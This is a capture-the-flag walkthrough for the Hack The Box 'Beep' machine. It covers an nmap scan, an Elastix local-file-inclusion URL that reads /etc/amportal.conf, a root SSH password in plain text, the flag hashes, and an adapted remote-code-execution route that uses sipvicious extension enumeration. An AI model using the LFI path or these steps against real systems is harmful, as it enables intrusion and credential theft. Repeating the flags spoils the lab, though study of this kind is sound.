Beep
ip:
10.10.10.7 nmap results
Open 10.10.10.7:22
Open 10.10.10.7:25
Open 10.10.10.7:80
Open 10.10.10.7:111
Open 10.10.10.7:110
Open 10.10.10.7:143
Open 10.10.10.7:443
Open 10.10.10.7:10000
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 adee5abb6937fb27afb83072a0f96f53 (DSA)
|_ 2048 bcc6735913a18a4b550750f6651d6d0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to [https://10.10.10.7/](https://10.10.10.7/)
110/tcp open pop3?
|*pop3-capabilities: USER IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE RESP-CODES TOP UIDL PIPELINING APOP STLS LOGIN-DELAY(0) EXPIRE(NEVER)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 882/udp status
|* 100024 1 885/tcp status
143/tcp open imap?
|_imap-capabilities: NO Completed MULTIAPPEND UNSELECT STARTTLS ACL OK ID ANNOTATEMORE QUOTA LITERAL+ URLAUTHA0001 IDLE X-NETSCAPE THREAD=REFERENCES LISTEXT CONDSTORE CATENATE UIDPLUS LIST-SUBSCRIBED NAMESPACE IMAP4rev1 SORT=MODSEQ RENAME SORT RIGHTS=kxte BINARY ATOMIC CHILDREN THREAD=ORDEREDSUBJECT IMAP4 MAILBOX-REFERRALS
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
|*ssl-date: 2023-07-28T17:25:29+00:00; +1s from scanner time.
| http-robots.txt: 1 disallowed entry
|*/
|_http-server-header: Apache/2.2.3 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_http-title: Elastix - Login page
993/tcp open imaps?
|_imap-capabilities: CAPABILITY
995/tcp open pop3s?
3306/tcp open mysql?
4445/tcp open upnotifyp?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1Elastix version: Elastix version 0.5
Elastix version 0.5Finding vuln:
searchsploit elastix
found multiple vuln
Solution 1 - LFI
searchsploit -m php/webapps/37637.pl
found an endpoint that is vulnerable to lfi.
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf&module=Accounts&action
found multiple creds.
user
pass
So I’ve got bunch of user and pass.
now what?
but let’s see which are the users here by /etc/passwd . it will narrow the attack surface.
First thing you should look is that.
I tried to do ssh in my linux but it shows error. as the ssh client the box using is outdated and insecure, thats why my machine wasn’t connecting to it,
Solving this issue.
after few research i’ve found this solution.
make a directory at home dir
mkdir -p .ssh
now create a config file.
nano config
paste these things.
however you can connect to it using putty.
user: root
pass: jEhdIekWmdjE
and we are in, as a root user.
root: f965360e0d402ce69bbb38566ddd2e8d
user: a290791a786a1bdcc8a59f81b4f3237a
Solution 2
— REMOTE CODE EXECUTION.
The Exploit db data base is too old. So i’ve found a new payload in github.
change the lhost according to tun0 and lport and exploit
but i’m getting error.
So i made some changes.
The Python "ModuleNotFoundError: No module named 'urllib2'" occurs because the urllib2 module has been split into urllib.request and urllib.response in Python 3.
To solve the error, import the module as from urllib.request import urlopen.
modified payload
Again another error.
As the ssl version of the website using is backdated V1. Modern web browser and libraries do not allow to connect to those website using outdated SSL protocol.
Hence I tried to modify script to bypass this ssl check but no luck.
I found a way that Rana Khalil was using, That is redirecting the traffic through burp and burp will forcefully redirect to the following website without SSL check.
And also we can check what’s going on in the background by checking the burp’s traffic.
To do this, on script, change the following
on burp change the following.
So our Final Payload will looks like. this.
Final
Now run it and also add a listener
It runs without error this time but still we don’t get the shell.
Let’s check in the burp request, what’s going on…..
The call failed. Maybe we need to change the default extension. As we don’t know which extension this app using . there is a tool which can detect valid extension in PBX. In particular the svwar tool identifies working extension lines on a PBX
Installing Sipvicious
pip install sipvicious
Now run the following command.
sudo sipvicious_svwar -m INVITE -e100-550 10.10.10.7
m: specifies a request method, INVITE
e: specifies an extension or extension range, in our case we set it to 100-550. if we don’t find any we will increase our range.
To be honest, I had to run the tool for several times to get this result. 🙂
I was getting these errors.
Ok. So we get the extension value that was using the app is 233
Final Payload
And here we go. Finally, We’ve got the initial Shell.
when we visit the webpage, it isn’t loading.
modify the minimum TLS version in Firefox
Open a new tab in Firefox.Enter "about:config" in the address bar and hit Enter/Return.
In the search box located above the list, enter "security.tls.version.min".
Locate the preference with the name "security.tls.version.min" and modify its value to ‘1’
Q.2.
TLS version:
developer tools > network > security
TLSv1
Q.2
What is the name of the software that's hosting a webserver on 443?
The elastix softwere version disclosed.
found lang directory from directory bruteforce. visiting that dir, click on any lang, eg: cn.lang.
and the version is disclosed.
Last updated
Was this helpful?